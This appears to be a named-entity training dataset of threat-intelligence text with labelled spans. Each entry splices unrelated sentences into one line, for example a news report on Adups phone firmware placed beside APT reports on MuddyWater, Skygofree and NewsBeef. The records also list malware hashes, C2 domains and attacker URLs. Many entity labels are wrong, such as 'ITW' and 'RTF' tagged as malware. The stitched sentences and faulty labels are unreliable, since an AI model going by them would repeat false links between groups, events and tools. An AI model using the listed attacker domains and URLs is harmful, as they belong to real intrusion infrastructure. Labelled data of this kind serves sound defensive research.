{"text": "\" I tried reaching out to Adups and never heard back , '' Strazzere tells Information Security Media Group . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . Datper : 7d70d659c421b50604ce3e0a1bf423ab7e54b9df361360933bac3bb852a31849 .", "spans": [{"start": 26, "end": 31, "label": "Organization"}, {"start": 74, "end": 106, "label": "Organization"}, {"start": 109, "end": 116, "label": "Organization"}, {"start": 195, "end": 198, "label": "Malware"}, {"start": 226, "end": 239, "label": "Vulnerability"}, {"start": 242, "end": 248, "label": "Malware"}, {"start": 251, "end": 315, "label": "Indicator"}]}
{"text": "\" BLU said they had no security department when I emailed them . The earliest use of the exploit ITW we were able to identify and confirm is a sample (e228045ef57fb8cc1226b62ada7eee9b) dating back to October 2018 (VirusTotal submission of 2018-10-29) with the RTF creation time 2018-10-23 . HomamDownloader : a624d2cd6dee3b6150df3ca61ee0f992e2d6b08b3107f5b00f8bf8bcfe07ebe7 .", "spans": [{"start": 2, "end": 5, "label": "Organization"}, {"start": 97, "end": 100, "label": "Malware"}, {"start": 260, "end": 263, "label": "Malware"}, {"start": 291, "end": 306, "label": "Malware"}, {"start": 309, "end": 373, "label": "Indicator"}]}
{"text": "'' Strazzere says he also failed to reach MediaTek , a Taiwanese fabless semiconductor manufacturer whose chipsets that powered BLU phones also contained Adups software . CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption . C2 : lywjrea.gmarketshop.net .", "spans": [{"start": 42, "end": 50, "label": "Organization"}, {"start": 128, "end": 131, "label": "Organization"}, {"start": 154, "end": 159, "label": "Organization"}, {"start": 171, "end": 184, "label": "Vulnerability"}, {"start": 262, "end": 274, "label": "Organization"}, {"start": 305, "end": 307, "label": "System"}, {"start": 310, "end": 333, "label": "Indicator"}]}
{"text": "To their credit , both Google and Amazon appear to have put pressure on device manufacturers to fix their devices when flaws are found , Strazzere says . As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese cyber espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity . C2 : krjregh.sacreeflame.com .", "spans": [{"start": 23, "end": 29, "label": "Organization"}, {"start": 34, "end": 40, "label": "Organization"}, {"start": 182, "end": 196, "label": "Vulnerability"}, {"start": 201, "end": 214, "label": "Vulnerability"}, {"start": 221, "end": 231, "label": "System"}, {"start": 280, "end": 286, "label": "Organization"}, {"start": 436, "end": 438, "label": "System"}, {"start": 441, "end": 464, "label": "Indicator"}]}
{"text": "For Google , Android security issues - even if not in the core operating code - are a reputation threat , and for Amazon , a product quality issue . Upon decrypting and executing , it drops two additional files wsc_proxy.exe (legitimate Avast executable) and a malicious DLL wsc.dll in the %TEMP% folder . C2 : psfir.sacreeflame.com .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 114, "end": 120, "label": "Organization"}, {"start": 211, "end": 224, "label": "Malware"}, {"start": 275, "end": 282, "label": "Malware"}, {"start": 306, "end": 308, "label": "System"}, {"start": 311, "end": 332, "label": "Indicator"}]}
{"text": "But devices sold outside of Amazon \" might not have ever seen fixes , '' he says . However , Beginning on 25 June 2019 , we started observing multiple commodity campaigns Mostly dropping AsyncRAT using the updated RTF weaponizer with the same exploit (CVE-2018-0798) . C2 : lywja.healthsvsolu.com .", "spans": [{"start": 28, "end": 34, "label": "Organization"}, {"start": 121, "end": 123, "label": "Organization"}, {"start": 187, "end": 195, "label": "Malware"}, {"start": 269, "end": 271, "label": "System"}, {"start": 274, "end": 296, "label": "Indicator"}]}
{"text": "Officials at BLU could n't be immediately reached for comment . Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer . C2 : phot.healthsvsolu.com .", "spans": [{"start": 13, "end": 16, "label": "Organization"}, {"start": 154, "end": 167, "label": "Organization"}, {"start": 186, "end": 199, "label": "Vulnerability"}, {"start": 209, "end": 223, "label": "System"}, {"start": 226, "end": 228, "label": "System"}, {"start": 231, "end": 252, "label": "Indicator"}]}
{"text": "Attitude Change The disinterest in the issues appears to have changed with The New York Times report , which lit a fire underneath Adups and BLU . These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers . C2 : blog.softfix.co.kr .", "spans": [{"start": 79, "end": 93, "label": "Organization"}, {"start": 131, "end": 136, "label": "Organization"}, {"start": 141, "end": 144, "label": "Organization"}, {"start": 184, "end": 197, "label": "Organization"}, {"start": 250, "end": 263, "label": "Vulnerability"}, {"start": 365, "end": 367, "label": "System"}, {"start": 370, "end": 388, "label": "Indicator"}]}
{"text": "Adups addressed the issue in a Nov. 16 news release , writing that some products made by BLU were updated in June with a version of its FOTA that had actually been intended for other clients who had requested an ability to stop text spam . In addition , a current ANY.RUN playback of our observed Elise infection is also available . C2 : news.softfix.co.kr .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 89, "end": 92, "label": "Organization"}, {"start": 136, "end": 140, "label": "System"}, {"start": 264, "end": 271, "label": "Malware"}, {"start": 297, "end": 302, "label": "Malware"}, {"start": 333, "end": 335, "label": "System"}, {"start": 338, "end": 356, "label": "Indicator"}]}
{"text": "That version flags messages \" containing certain language associated with junk texts and flags numbers associated with junk calls and not in a user 's contacts , '' the company says . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . C2 : www.gokickes.com .", "spans": [{"start": 250, "end": 264, "label": "Vulnerability"}, {"start": 331, "end": 345, "label": "Malware"}, {"start": 376, "end": 388, "label": "Malware"}, {"start": 469, "end": 471, "label": "System"}, {"start": 474, "end": 490, "label": "Indicator"}]}
{"text": "Manufacturers should be keeping close tabs on what software ends up on their devices . Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . C2 : log.gokickes.com .", "spans": [{"start": 174, "end": 187, "label": "Vulnerability"}, {"start": 205, "end": 230, "label": "Malware"}, {"start": 233, "end": 245, "label": "Malware"}, {"start": 297, "end": 299, "label": "System"}, {"start": 302, "end": 318, "label": "Indicator"}]}
{"text": "But it would appear that BLU only took action after Kryptowire notified it along with Google , Adups and Amazon . Most recently though , a new campaign , targeting Belarus , Turkey and Ukraine , has emerged that caught the attention of Check Point researchers . The group is responsible for the campaign known as Operation Wilted Tulip .", "spans": [{"start": 25, "end": 28, "label": "Organization"}, {"start": 52, "end": 62, "label": "Organization"}, {"start": 86, "end": 92, "label": "Organization"}, {"start": 95, "end": 100, "label": "Organization"}, {"start": 105, "end": 111, "label": "Organization"}, {"start": 236, "end": 247, "label": "Organization"}]}
{"text": "\" When BLU raised objections , Adups took immediate measures to disable that functionality on BLU phones , '' Adups says . The well-crafted and socially engineered malicious documents then become the \ufb01rst stage of a long and mainly \ufb01leless infection chain that eventually delivers POWERSTATS , a signature PowerShell backdoor of this threat group . Dark Caracal is threat group that has been attributed to the Lebanese General Directorate of General Security ( GDGS ) and has operated since at least 2012 .", "spans": [{"start": 7, "end": 10, "label": "Organization"}, {"start": 31, "end": 36, "label": "Organization"}, {"start": 94, "end": 97, "label": "Organization"}, {"start": 281, "end": 291, "label": "Malware"}, {"start": 306, "end": 325, "label": "Malware"}, {"start": 334, "end": 346, "label": "Organization"}, {"start": 349, "end": 361, "label": "Organization"}, {"start": 419, "end": 458, "label": "Organization"}, {"start": 461, "end": 465, "label": "Organization"}]}
{"text": "The greater worry is that these situations may sometimes not be simple mistakes . This powerful backdoor can receive commands from the attackers , enabling it to ex\ufb01ltrate \ufb01les from the system it is running on , execute additional scripts , delete \ufb01les , and more . Darkhotel is a threat group that has been active since at least 2004 .", "spans": [{"start": 96, "end": 104, "label": "Malware"}, {"start": 162, "end": 176, "label": "Malware"}, {"start": 212, "end": 238, "label": "Malware"}, {"start": 241, "end": 252, "label": "Malware"}, {"start": 266, "end": 275, "label": "Organization"}]}
{"text": "Security experts have long warned of the ability of advanced adversaries to subvert hardware and software supply chains . If the macros in SPK KANUN DE\u011e\u0130\u015e\u0130KL\u0130\u011e\u0130 G\u0130B G\u00d6R\u00dc\u015e\u00dc.doc\u201d are enabled , an embedded payload is decoded and saved in the %APPDATA% directory with the name CiscoAny.exe . The group has conducted activity on hotel and business center Wi\u2011Fi and physical connections as well as peer-to-peer and file sharing networks .", "spans": [{"start": 139, "end": 148, "label": "Malware"}, {"start": 273, "end": 285, "label": "Malware"}]}
{"text": "Also , the software vulnerabilities pointed out in the FOTA software by Strazzere in 2015 could have been taken advantage of by cybercriminals looking to steal bank account details or execute other frauds . INF \ufb01les have been used in the past by MuddyWater , although they were launched using Advpack.dll and not IEAdvpack.dll . The actors have also conducted spearphishing .", "spans": [{"start": 11, "end": 35, "label": "Vulnerability"}, {"start": 55, "end": 59, "label": "System"}, {"start": 207, "end": 215, "label": "System"}, {"start": 246, "end": 256, "label": "Organization"}, {"start": 293, "end": 304, "label": "System"}, {"start": 313, "end": 326, "label": "System"}]}
{"text": "Strazzere advises that consumers should look at the pedigree of mobile manufacturers and take a close look at their security track record before making a decision on what device to buy . In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document . Unknown .", "spans": [{"start": 210, "end": 219, "label": "Malware"}, {"start": 256, "end": 266, "label": "Malware"}]}
{"text": "\" In the end , the consumer needs to vote with their wallet , '' he says . Although it has focused most of its efforts on the Middle East region , the political af\ufb01liations , motives and purposes behind MuddyWater\u2019s attacks are not very well- de\ufb01ned , thus earning it its name . Charming Kitten is an Iranian cyber espionage group that has been active since approximately 2014 .", "spans": [{"start": 203, "end": 215, "label": "Organization"}, {"start": 279, "end": 294, "label": "Organization"}]}
{"text": "Skygofree : Following in the footsteps of HackingTeam 16 JAN 2018 At the beginning of October 2017 , we discovered new Android spyware with several features previously unseen in the wild . In the past , countries such as Saudi Arabia , the UAE and Turkey have been a MuddyWater's main target , but the campaigns have also reached a much wider audience , making their way to victims in countries such as Belarus and Ukraine . They appear to focus on targeting individuals of interest to Iran who work in academic research , human rights , and media , with most victims having been located in Iran , the US , Israel , and the UK .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 42, "end": 53, "label": "Organization"}, {"start": 119, "end": 126, "label": "System"}, {"start": 267, "end": 279, "label": "Organization"}]}
{"text": "In the course of further research , we found a number of related samples that point to a long-term development process . MuddyWater target groups across Middle East and Central Asia , primarily using spear phishing emails with malicious attachments . Charming Kitten usually tries to access private email and Facebook accounts , and sometimes establishes a foothold on victim computers as a secondary objective .", "spans": [{"start": 121, "end": 131, "label": "Organization"}, {"start": 251, "end": 266, "label": "Organization"}, {"start": 299, "end": 304, "label": "System"}, {"start": 309, "end": 317, "label": "Organization"}]}
{"text": "We believe the initial versions of this malware were created at least three years ago \u2013 at the end of 2014 . Most recently MuddyWater were connected to a campaign in March that targeted organizations in Turkey , Pakistan , and Tajikistan . The group 's TTPs overlap extensively with another group , Magic Hound , resulting in reporting that may not distinguish between the two groups' activities .", "spans": [{"start": 123, "end": 133, "label": "Organization"}, {"start": 299, "end": 310, "label": "Organization"}]}
{"text": "Since then , the implant \u2019 s functionality has been improving and remarkable new features implemented , such as the ability to record audio surroundings via the microphone when an infected device is in a specified location ; the stealing of WhatsApp messages via Accessibility Services ; and the ability to connect an infected device to Wi-Fi networks controlled by cybercriminals . The group has been quite visible since the initial 2017 Malwarebytes report on their elaborate espionage attack against the Saudi Arabian government . Cleaver : Threat Group 2889 , TG-2889 .", "spans": [{"start": 241, "end": 249, "label": "System"}, {"start": 387, "end": 392, "label": "Organization"}, {"start": 534, "end": 541, "label": "Organization"}, {"start": 544, "end": 561, "label": "Organization"}, {"start": 564, "end": 571, "label": "Organization"}]}
{"text": "We observed many web landing pages that mimic the sites of mobile operators and which are used to spread the Android implants . Our analysis revealed that they drop a new backdoor , which is written in PowerShell as MuddyWater\u2019s known POWERSTATS backdoor . Cleaver is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver .", "spans": [{"start": 109, "end": 116, "label": "System"}, {"start": 216, "end": 228, "label": "Organization"}, {"start": 235, "end": 254, "label": "System"}, {"start": 257, "end": 264, "label": "Organization"}]}
{"text": "These domains have been registered by the attackers since 2015 . We assume that RunPow stands for run PowerShell , \u201d and triggers the PowerShell code embedded inside the .dll file . Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 ( TG-2889 ) .", "spans": [{"start": 102, "end": 112, "label": "Malware"}, {"start": 170, "end": 179, "label": "Malware"}, {"start": 222, "end": 229, "label": "Organization"}, {"start": 243, "end": 260, "label": "Organization"}, {"start": 263, "end": 270, "label": "Organization"}]}
{"text": "According to our telemetry , that was the year the distribution campaign was at its most active . This backdoor has some features similar to a previously discovered version of the Muddywater backdoor . Cobalt Group : Cobalt Gang , Cobalt Spider .", "spans": [{"start": 103, "end": 111, "label": "System"}, {"start": 180, "end": 190, "label": "Organization"}, {"start": 202, "end": 214, "label": "Organization"}, {"start": 217, "end": 228, "label": "Organization"}, {"start": 231, "end": 244, "label": "Organization"}]}
{"text": "The activities continue : the most recently observed domain was registered on October 31 , 2017 . Based on our analysis , we can confirm that MuddyWater target Turkish government organizations related to the finance and energy sectors . Cobalt Group is a financially motivated threat group that has primarily targeted financial institutions .", "spans": [{"start": 142, "end": 152, "label": "Organization"}, {"start": 160, "end": 192, "label": "Organization"}, {"start": 208, "end": 215, "label": "Organization"}, {"start": 220, "end": 226, "label": "Organization"}, {"start": 237, "end": 249, "label": "Organization"}]}
{"text": "Based on our KSN statistics , there are several infected individuals , exclusively in Italy . This is yet another similarity with previous MuddyWater campaigns , which were known to have targeted multiple Turkish government entities . The group has conducted intrusions to steal money via targeting ATM systems , card processing , payment systems and SWIFT systems .", "spans": [{"start": 139, "end": 149, "label": "Organization"}, {"start": 299, "end": 310, "label": "System"}, {"start": 331, "end": 346, "label": "System"}, {"start": 351, "end": 364, "label": "System"}]}
{"text": "Moreover , as we dived deeper into the investigation , we discovered several spyware tools for Windows that form an implant for exfiltrating sensitive data on a targeted machine . The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents . Cobalt Group has mainly targeted banks in Eastern Europe , Central Asia , and Southeast Asia .", "spans": [{"start": 95, "end": 102, "label": "System"}, {"start": 221, "end": 229, "label": "Malware"}, {"start": 350, "end": 362, "label": "Organization"}]}
{"text": "The version we found was built at the beginning of 2017 , and at the moment we are not sure whether this implant has been used in the wild . Trend Micro\u2122 Deep Discovery\u2122 provides detection , in-depth analysis , and proactive response to today\u2019s stealthy malware , and targeted attacks in real time . One of the alleged leaders was arrested in Spain in early 2018 , but the group still appears to be active .", "spans": [{"start": 141, "end": 153, "label": "Organization"}, {"start": 277, "end": 284, "label": "Organization"}]}
{"text": "We named the malware Skygofree , because we found the word in one of the domains * . MuddyWater first surfaced in 2017 . The group has been known to target organizations in order to use their access to then compromise additional victims .", "spans": [{"start": 21, "end": 30, "label": "Malware"}, {"start": 85, "end": 95, "label": "Organization"}]}
{"text": "Malware Features Android According to the observed samples and their signatures , early versions of this Android malware were developed by the end of 2014 and the campaign has remained active ever since . First stage infections and graphical decoys have been described by multiple sources , including in our previous research MuddyWater expands operations . Reporting indicates there may be links between Cobalt Group and both the malware Carbanak and the group Carbanak .", "spans": [{"start": 17, "end": 24, "label": "System"}, {"start": 105, "end": 112, "label": "System"}, {"start": 326, "end": 336, "label": "Organization"}, {"start": 405, "end": 417, "label": "Organization"}, {"start": 439, "end": 447, "label": "Malware"}, {"start": 462, "end": 470, "label": "Organization"}]}
{"text": "The code and functionality have changed numerous times ; from simple unobfuscated malware at the beginning to sophisticated multi-stage spyware that gives attackers full remote control of the infected device . MuddyWater compiles various offensive Python scripts . Taidoor is a threat group that has operated since at least 2009 and has primarily targeted the Taiwanese government .", "spans": [{"start": 210, "end": 220, "label": "Organization"}, {"start": 248, "end": 254, "label": "System"}, {"start": 255, "end": 262, "label": "System"}, {"start": 265, "end": 272, "label": "Organization"}, {"start": 360, "end": 380, "label": "Organization"}]}
{"text": "We have examined all the detected versions , including the latest one that is signed by a certificate valid from September 14 , 2017 . This includes Python scripts . TEMP.Veles \uff1a XENOTIME .", "spans": [{"start": 166, "end": 176, "label": "Organization"}, {"start": 179, "end": 187, "label": "Organization"}]}
{"text": "The implant provides the ability to grab a lot of exfiltrated data , like call records , text messages , geolocation , surrounding audio , calendar events , and other memory information stored on the device . Usually , the Stageless Meterpreter has the Ext_server_stdapi.x64.dll\u201d , Ext_server_extapi.x64.dll\u201d , and Ext_server_espia.x64.dll\u201d extensions . TEMP.Veles is a Russia based threat group that has targeted critical infrastructure .", "spans": [{"start": 223, "end": 244, "label": "Malware"}, {"start": 253, "end": 279, "label": "Malware"}, {"start": 282, "end": 308, "label": "Malware"}, {"start": 315, "end": 340, "label": "Malware"}, {"start": 354, "end": 364, "label": "Organization"}]}
{"text": "After manual launch , it shows a fake welcome notification to the user : Dear Customer , we \u2019 re updating your configuration and it will be ready as soon as possible . The January 2017 report followed up on other private reports published on the group\u2019s BeEF-related activity in 2015 and 2016 . The group has been observed utilizing TRITON , a malware framework designed to manipulate industrial safety systems .", "spans": [{"start": 254, "end": 266, "label": "Organization"}, {"start": 333, "end": 339, "label": "Malware"}]}
{"text": "At the same time , it hides an icon and starts background services to hide further actions from the user . Previous analysis of the NewsBeef APT indicates that the group focuses on Saudi Arabian (SA) and Western targets , and lacks advanced offensive technology development capabilities . The White Company is a likely state-sponsored threat actor with advanced capabilities .", "spans": [{"start": 132, "end": 140, "label": "Organization"}, {"start": 289, "end": 306, "label": "Organization"}]}
{"text": "Service Name Purpose AndroidAlarmManager Uploading last recorded .amr audio AndroidSystemService Audio recording AndroidSystemQueues Location tracking with movement detection ClearSystems GSM tracking ( CID , LAC , PSC ) ClipService Clipboard stealing AndroidFileManager Uploading all exfiltrated data AndroidPush XMPP \u0421 & C protocol ( url.plus:5223 ) RegistrationService Registration on C & C via HTTP ( url.plus/app/pro/ ) Interestingly , a self-protection feature was implemented in almost every service However , in the summer of 2016 , NewsBeef deployed a new toolset that includes macro-enabled Office documents , PowerSploit , and the Pupy backdoor . From 2017 through 2018 , the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan .", "spans": [{"start": 188, "end": 191, "label": "System"}, {"start": 336, "end": 349, "label": "Indicator"}, {"start": 405, "end": 422, "label": "Indicator"}, {"start": 541, "end": 549, "label": "Organization"}, {"start": 587, "end": 617, "label": "System"}, {"start": 620, "end": 631, "label": "System"}, {"start": 642, "end": 655, "label": "System"}, {"start": 754, "end": 764, "label": "Organization"}, {"start": 769, "end": 791, "label": "Organization"}]}
{"text": ". The most recent NewsBeef campaign uses this toolset in conjunction with spearphishing emails , links sent over social media/standalone private messaging applications , and watering hole attacks that leverage compromised high-profile websites some belonging to the SA government . Molerats : Operation Molerats , Gaza Cybergang .", "spans": [{"start": 18, "end": 26, "label": "Organization"}, {"start": 282, "end": 290, "label": "Organization"}, {"start": 293, "end": 311, "label": "Organization"}, {"start": 314, "end": 328, "label": "Organization"}]}
{"text": "Since in Android 8.0 ( SDK API 26 ) the system is able to kill idle services , this code raises a fake update notification to prevent it : Cybercriminals have the ability to control the implant via HTTP , XMPP , binary SMS and FirebaseCloudMessaging ( or GoogleCloudMessaging in older versions ) protocols . The NewsBeef actor deployed a new toolset in a campaign that focused primarily on Saudi Arabian targets . Molerats is a politically-motivated threat group that has been operating since 2012 .", "spans": [{"start": 9, "end": 20, "label": "System"}, {"start": 312, "end": 320, "label": "Organization"}, {"start": 414, "end": 422, "label": "Organization"}]}
{"text": "Such a diversity of protocols gives the attackers more flexible control . NewsBeef continues to deploy malicious macro-enabled Office documents , poisoned legitimate Flash and Chrome installers , PowerSploit , and Pupy tools . The group 's victims have primarily been in the Middle East , Europe , and the United States .", "spans": [{"start": 74, "end": 82, "label": "Organization"}, {"start": 166, "end": 171, "label": "System"}, {"start": 176, "end": 193, "label": "System"}, {"start": 196, "end": 207, "label": "System"}, {"start": 214, "end": 224, "label": "System"}]}
{"text": "In the latest implant versions there are 48 different commands . The NewsBeef campaign is divided into two main attack vectors , spearphishing and strategic web compromise watering hole attacks . MuddyWater : Seedworm , TEMP.Zagros .", "spans": [{"start": 69, "end": 77, "label": "Organization"}, {"start": 196, "end": 206, "label": "Organization"}, {"start": 209, "end": 217, "label": "Organization"}, {"start": 220, "end": 231, "label": "Organization"}]}
{"text": "You can find a full list with short descriptions in the Appendix . On December 25 , 2016 , the NewsBeef APT stood up a server to host a new set of Microsoft Office documents (maintaining malicious macros and PowerShell scripts) to support its spear-phishing operations . MuddyWater is an Iranian threat group that has primarily targeted Middle Eastern nations , and has also targeted European and North American nations .", "spans": [{"start": 95, "end": 103, "label": "Organization"}, {"start": 271, "end": 281, "label": "Organization"}]}
{"text": "Here are some of the most notable : \u2018 geofence \u2019 \u2013 this command adds a specified location to the implant \u2019 s internal database and when it matches a device \u2019 s current location the malware triggers and begins to record surrounding audio . These compromised servers include Saudi Arabian government servers and other high-value organizational identities relevant to NewsBeef's targets . The group 's victims are mainly in the telecommunications , government ( IT services ) , and oil sectors .", "spans": [{"start": 365, "end": 375, "label": "Organization"}, {"start": 425, "end": 443, "label": "Organization"}, {"start": 446, "end": 456, "label": "Organization"}, {"start": 459, "end": 470, "label": "Organization"}, {"start": 479, "end": 490, "label": "Organization"}]}
{"text": "\u201d social \u201d \u2013 this command that starts the \u2018 AndroidMDMSupport \u2019 service \u2013 this allows the files of any other installed application to be grabbed . However , Kaspersky Security Network (KSN) records also contain links that victims clicked from the Outlook web client outlook.live.com\u201d as well as attachments arriving through the Outlook desktop application . Activity from this group was previously linked to FIN7 , but the group is believed to be a distinct group possibly motivated by espionage .", "spans": [{"start": 157, "end": 166, "label": "Organization"}, {"start": 266, "end": 283, "label": "Malware"}, {"start": 408, "end": 412, "label": "Organization"}]}
{"text": "The service name makes it clear that by applications the attackers mean MDM solutions that are business-specific tools . Interestingly , NewsBeef set up its server using the hosting provider Choopa , LLC , US\u201d , the same hosting provider that the group used in attacks over the summer of 2016 . Naikon is a threat group that has focused on targets around the South China Sea .", "spans": [{"start": 137, "end": 145, "label": "Organization"}, {"start": 191, "end": 197, "label": "System"}, {"start": 200, "end": 203, "label": "System"}, {"start": 206, "end": 209, "label": "System"}, {"start": 295, "end": 301, "label": "Organization"}]}
{"text": "The operator can specify a path with the database of any targeted application and server-side PHP script name for uploading . NTG\u2019s IT focus and client list likely aided NewsBeef\u2019s delivery of malicious PowerShell-enabled Office documents and poisoned installers . The group has been attributed to the Chinese People \u2019s Liberation Army \u2019s ( PLA ) Chengdu Military Region Second Technical Reconnaissance Bureau ( Military Unit Cover Designator 78020 ) .", "spans": [{"start": 126, "end": 131, "label": "Organization"}, {"start": 170, "end": 180, "label": "Organization"}, {"start": 302, "end": 338, "label": "Organization"}, {"start": 341, "end": 344, "label": "Organization"}, {"start": 347, "end": 409, "label": "Organization"}, {"start": 412, "end": 448, "label": "Organization"}]}
{"text": "Several hardcoded applications targeted by the MDM-grabbing command \u2018 wifi \u2019 \u2013 this command creates a new Wi-Fi connection with specified configurations from the command and enable Wi-Fi if it is disabled . In other schemes , NewsBeef sent macro-enabled Office attachments from spoofed law firm identities or other relevant service providers to targets in SA . While Naikon shares some characteristics with APT30 , the two groups do not appear to be exact matches .", "spans": [{"start": 226, "end": 234, "label": "Organization"}, {"start": 367, "end": 373, "label": "Organization"}, {"start": 407, "end": 412, "label": "Organization"}]}
{"text": "So , when a device connects to the established network , this process will be in silent and automatic mode . The law firm in this scheme is based in the United Kingdom and is the sole location for targets outside of SA for this campaign . APT39 : Chafer .", "spans": [{"start": 197, "end": 204, "label": "Organization"}, {"start": 239, "end": 244, "label": "Organization"}, {"start": 247, "end": 253, "label": "Organization"}]}
{"text": "This command is used to connect the victim to a Wi-Fi network controlled by the cybercriminals to perform traffic sniffing and man-in-the-middle ( MitM ) attacks . Starting in October 2016 , NewsBeef compromised a set of legitimate servers (shown below) , and injected JavaScript to redirect visitors to http://analytics-google.org:69/Check.aspx . APT39 is Oan Iranian cyber espionage group that has been active since at least 2014 .", "spans": [{"start": 191, "end": 199, "label": "Organization"}, {"start": 348, "end": 353, "label": "Organization"}]}
{"text": "addWifiConfig method code fragments \u2018 camera \u2019 \u2013 this command records a video/capture a photo using the front-facing camera when someone next unlocks the device . For example , on a Saudi government website , the NewsBeef APT delivered packed JavaScript into the bottom of a referenced script that is included in every page served from the site the packed and unpacked JavaScript is shown below . They have targeted the telecommunication and travel industries to collect personal information that aligns with Iran 's national priorities .", "spans": [{"start": 213, "end": 221, "label": "Organization"}, {"start": 369, "end": 379, "label": "System"}]}
{"text": "Some versions of the Skygofree feature the self-protection ability exclusively for Huawei devices . The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx\u201d . APT41 is a group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity .", "spans": [{"start": 21, "end": 30, "label": "Malware"}, {"start": 83, "end": 89, "label": "Organization"}, {"start": 104, "end": 114, "label": "Malware"}, {"start": 115, "end": 121, "label": "Malware"}, {"start": 147, "end": 154, "label": "Malware"}, {"start": 329, "end": 334, "label": "Organization"}]}
{"text": "There is a \u2018 protected apps \u2019 list in this brand \u2019 s smartphones , related to a battery-saving concept . A high volume of redirections from the compromised site continues into mid-January 2017 . APT41 has been active since as early as 2012 .", "spans": [{"start": 122, "end": 134, "label": "Organization"}, {"start": 195, "end": 200, "label": "Organization"}]}
{"text": "Apps not selected as protected apps stop working once the screen is off and await re-activation , so the implant is able to determine that it is running on a Huawei device and add itself to this list . However , as this recent campaign indicates , the NewsBeef APT appears to have shifted its intrusion toolset away from BeEF and towards macro-enabled malicious Office documents , PowerSploit , and Pupy . The group has been observed targeting healthcare , telecom , technology , and video game industries in 14 countries .", "spans": [{"start": 158, "end": 164, "label": "Organization"}, {"start": 252, "end": 260, "label": "Organization"}, {"start": 362, "end": 378, "label": "System"}, {"start": 381, "end": 392, "label": "System"}, {"start": 399, "end": 403, "label": "System"}]}
{"text": "Due to this feature , it is clear that the developers paid special attention to the work of the implant on Huawei devices . Despite this shift in toolset , the group still relies on old infrastructure as evidenced by their reuse of servers hosted by the service providers Choopa and Atlantic.net . Axiom : Group72 .", "spans": [{"start": 107, "end": 113, "label": "Organization"}, {"start": 298, "end": 303, "label": "Organization"}, {"start": 306, "end": 313, "label": "Organization"}]}
{"text": "Also , we found a debug version of the implant ( 70a937b2504b3ad6c623581424c7e53d ) that contains interesting constants , including the version of the spyware . Its attack activities can be traced back to April 2012 . Axiom is a cyber espionage group suspected to be associated with the Chinese government .", "spans": [{"start": 49, "end": 81, "label": "Indicator"}, {"start": 218, "end": 223, "label": "Organization"}]}
{"text": "Debug BuildConfig with the version After a deep analysis of all discovered versions of Skygofree , we made an approximate timeline of the implant \u2019 s evolution . The OceanLotus reflects a very strong confrontational ability and willing to attack by keep evolving their techniques . It is responsible for the Operation SMN campaign .", "spans": [{"start": 87, "end": 96, "label": "Malware"}, {"start": 166, "end": 176, "label": "Organization"}]}
{"text": "Mobile implant evolution timeline However , some facts indicate that the APK samples from stage two can also be used separately as the first step of the infection . These APT attacks and adopting confrontation measures will exist for a long time . Though both this group and Winnti Group use the malware Winnti , the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting .", "spans": [{"start": 171, "end": 174, "label": "Organization"}, {"start": 187, "end": 218, "label": "Organization"}, {"start": 275, "end": 281, "label": "Organization"}, {"start": 304, "end": 310, "label": "Malware"}]}
{"text": "Below is a list of the payloads used by the Skygofree implant in the second and third stages . OceanLotus\u2019 targets are global . Suckfly is a China based threat group that has been active since at least 2014 .", "spans": [{"start": 44, "end": 53, "label": "Malware"}, {"start": 95, "end": 106, "label": "Organization"}, {"start": 128, "end": 135, "label": "Organization"}]}
{"text": "Reverse shell payload The reverse shell module is an external ELF file compiled by the attackers to run on Android . OceanLotus have been actively using since at least early 2018 . TA459 is a threat group believed to operate out of China that has targeted countries including Russia , Belarus , Mongolia , and others .", "spans": [{"start": 107, "end": 114, "label": "System"}, {"start": 117, "end": 127, "label": "Organization"}, {"start": 181, "end": 186, "label": "Organization"}]}
{"text": "The choice of a particular payload is determined by the implant \u2019 s version , and it can be downloaded from the command and control ( C & C ) server soon after the implant starts , or after a specific command . OceanLotus malware family samples used no earlier than 2017 . TA505 is a financially motivated threat group that has been active since at least 2014 .", "spans": [{"start": 211, "end": 221, "label": "Organization"}, {"start": 273, "end": 278, "label": "Organization"}]}
{"text": "In the most recent case , the choice of the payload zip file depends on the device process architecture . We identified two methods to deliver the KerrDown downloader to targets . The group is known for frequently changing malware and driving global trends in criminal malware distribution .", "spans": [{"start": 106, "end": 108, "label": "Organization"}, {"start": 147, "end": 155, "label": "Malware"}]}
